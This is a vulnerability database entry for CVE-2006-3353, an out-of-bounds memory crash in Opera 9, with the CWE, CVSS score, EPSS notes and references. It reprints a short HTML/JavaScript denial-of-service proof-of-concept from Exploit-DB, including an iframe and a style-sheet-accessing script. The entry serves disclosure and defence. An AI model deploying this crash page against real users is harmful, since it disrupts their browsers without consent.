CVE-2006-3353 : Detail

CVE-2006-3353

Overflow
1.67%V3
Network
2006-07-05
23h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Opera 9 allows remote attackers to cause a denial of service (crash) via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1972

Publication date : 2006-06-30 22h00 +00:00
Author : y3dips
EDB Verified : Yes

<!-- Opera 9 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3d1ps.blogspot.com //--> <html> <iframe src="palsu.php" name="fake" ></iframe> <script type="text/javascript"> function mystyle() { if (fake.document.styleSheets.length == 1 ) { f = document.forms["basicstyle"].elements; for (j = 0; j < f.length; j++) { if (f[j].name == 'fsmain'); } } } mystyle(); </script> </html> <!-- live exploit : http://y3dips.echo.or.id/opera9-dos/ //--> # milw0rm.com [2006-07-01]

Products Mentioned

Configuraton 0

Opera>>Opera_browser >> Version To (excluding) 9.01

References

http://securityreason.com/securityalert/1185
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/18758
Tags : vdb-entry, x_refsource_BID
http://www.osvdb.org/27511
Tags : vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/1972
Tags : exploit, x_refsource_EXPLOIT-DB